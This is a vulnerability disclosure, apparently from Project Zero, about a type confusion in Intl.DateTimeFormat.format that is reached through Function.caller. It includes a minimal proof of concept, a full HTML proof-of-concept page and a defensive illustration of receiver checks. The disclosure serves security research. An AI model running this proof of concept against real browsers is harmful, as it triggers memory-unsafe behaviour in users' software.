
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1036

There is a type confusion vulnerability when calling DateTimeFormat.format. This function is provided as a bound function by a getter in the DateTimeFormat class. Binding the function ensures that the this object is of the right type. However, when the bound function is called, it calls into user script when converting the date parameter, which can call Function.caller, obtaining the unbound function. This type unsafe function can then be called on any type.

A minimal PoC is as follows, and a full PoC is attached.

var i = new Intl.DateTimeFormat();
var q;

function f(){
    q = f.caller;
    return 10;
}

i.format({valueOf : f});

q.call(0x77777777);
-->

<html>
<body>
<script>

var date = new Date(Date.UTC(2012, 11, 20, 3, 0, 0));

var i = new Intl.DateTimeFormat();

//print(i);

var q;

function f(){
    //print("in f");
    //print(f.caller);
    q = f.caller;
    return 10;
}

try{
    i.format({valueOf : f});
}catch(e){
    //print("problem");
}

//print(q);

q.call(0x77777777);

</script>
</body>
</html>
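As an added illustration (not part of the Project Zero report or of the PoC above), the following JavaScript models the pattern the report describes: a getter hands out a bound method, and the question is what happens when the unbound implementation is applied to an arbitrary receiver such as the PoC's 0x77777777. The formatter classes, the WeakSet brand and the helper names are constructed for this example; the point is that a receiver check inside the method fails closed where reliance on the binding alone does not.

```javascript
// Constructed illustration, not code from the Project Zero report: the same
// "getter returns a bound method" pattern, once relying on the binding alone
// and once with an explicit receiver (brand) check inside the method.
const brand = new WeakSet();

function unsafeFormatImpl(date) {
  // Trusts that the binding delivered the right receiver; a leaked unbound
  // reference can be applied to anything and quietly reads bogus state.
  return `${this.label}:${Number(date)}`;
}

function safeFormatImpl(date) {
  // Receiver check happens before any internal state is touched, so a leaked
  // unbound reference fails closed with a TypeError on a foreign receiver.
  if (!brand.has(this)) {
    throw new TypeError("format called on an incompatible receiver");
  }
  // Number() may run user code (valueOf), just as the native date coercion
  // in the report does; the check above does not depend on what it does.
  return `${this.label}:${Number(date)}`;
}

class UnsafeFormatter {
  constructor(label) { this.label = label; }
  get format() { return unsafeFormatImpl.bind(this); }
}

class SafeFormatter {
  constructor(label) { this.label = label; brand.add(this); }
  get format() { return safeFormatImpl.bind(this); }
}

// Apply an unbound implementation to a chosen receiver and report how it
// behaves: "value" with the result, or "error" with the error class name.
function callUnbound(impl, receiver) {
  try {
    return { kind: "value", value: impl.call(receiver, 0) };
  } catch (e) {
    return { kind: "error", name: e.constructor.name };
  }
}

// Legitimate use through the getter works for both variants.
console.log(new SafeFormatter("utc").format({ valueOf: () => 10 })); // utc:10
// Unbound copies on the PoC's receiver: the unchecked one runs on a Number
// wrapper and returns "undefined:0"; the checked one throws a TypeError.
console.log(callUnbound(unsafeFormatImpl, 0x77777777));
console.log(callUnbound(safeFormatImpl, 0x77777777));
```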